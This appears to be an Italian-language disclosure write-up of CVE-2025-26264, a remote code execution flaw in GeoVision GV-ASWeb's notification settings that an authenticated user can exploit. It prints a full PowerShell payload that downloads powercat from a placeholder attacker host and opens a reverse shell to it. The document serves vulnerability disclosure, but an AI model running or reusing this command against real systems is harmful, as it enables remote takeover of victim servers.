
CVE-2025-26264 - GeoVision GV-ASWeb con versione 6.1.2.0 o inferiore, contiene una vulnerabilità di esecuzione di codice remoto (RCE) nella sua funzionalità Impostazioni di notifica. Un utente autenticato con privilegi "Impostazioni di sistema" in ASWeb può sfruttare questo difetto per eseguire comandi arbitrari sul server, portando a un compromesso completo del sistema.
CVE-2025-26264 - GeoVision GV-ASWeb con versione 6.1.2.0 o precedente contiene una vulnerabilità di Remote Code Execution (RCE) nella funzionalità Notification Settings. Un attaccante autenticato con privilegi "System Settings" in ASWeb può sfruttare questa falla per eseguire comandi arbitrari sul server, portando a una compromissione totale del sistema.
Per eseguire un attacco con successo, un attaccante richiede:
La vulnerabilità può essere sfruttata per eseguire le seguenti azioni non autorizzate:
È possibile sfruttare la vulnerabilità di Remote Code Execution nella piattaforma ASWeb di GeoVision GV-ASManager sulle versioni 6.1.2.0 o precedenti (nessuna correzione disponibile al 26 febbraio 2025).
La funzione Notification Setting di ASWeb di GeoVision ASManager è vulnerabile a RCE
Richiesta HTTP per impostare una notifica su un evento specifico: tentativo di accesso TAWeb fallito
Secondo questo script, se si verifica un tentativo di accesso TAWeb fallito, verrà eseguito il seguente script PowerShell:
powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell
Un tentativo di autenticazione fallito in TAWeb
Host della vittima: lo script apre una backdoor verso l'host dell'attaccante.
Host dell'attaccante: un attaccante ottiene la shell
Se hai una domanda, puoi contattarmi, Giorgi Dograshvili, su LinkedIn.